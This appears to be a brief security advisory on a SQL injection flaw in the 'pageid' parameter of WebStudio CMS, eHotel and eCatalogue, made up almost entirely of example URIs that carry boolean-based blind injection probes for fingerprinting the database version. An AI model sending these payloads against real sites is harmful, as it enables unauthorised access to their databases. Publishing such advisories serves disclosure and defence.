|
Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example URIs are available: For WebStudio CMS http://www.example.com/index.php?pageid=1+and+1=1 http://www.example.com/index.php?pageid=1+and+1=2 http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=3 http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=4 http://www.example.com/index.php?pageid=1+and+substring(@@version,1,1)=5 For WebStudio eHotel and WebStudio eCatalogue http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=3 http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=4 http://www.example.com/index.php?pageid=50+and+substring(@@version,1,1)=5 |
|
 Privacy Statement |
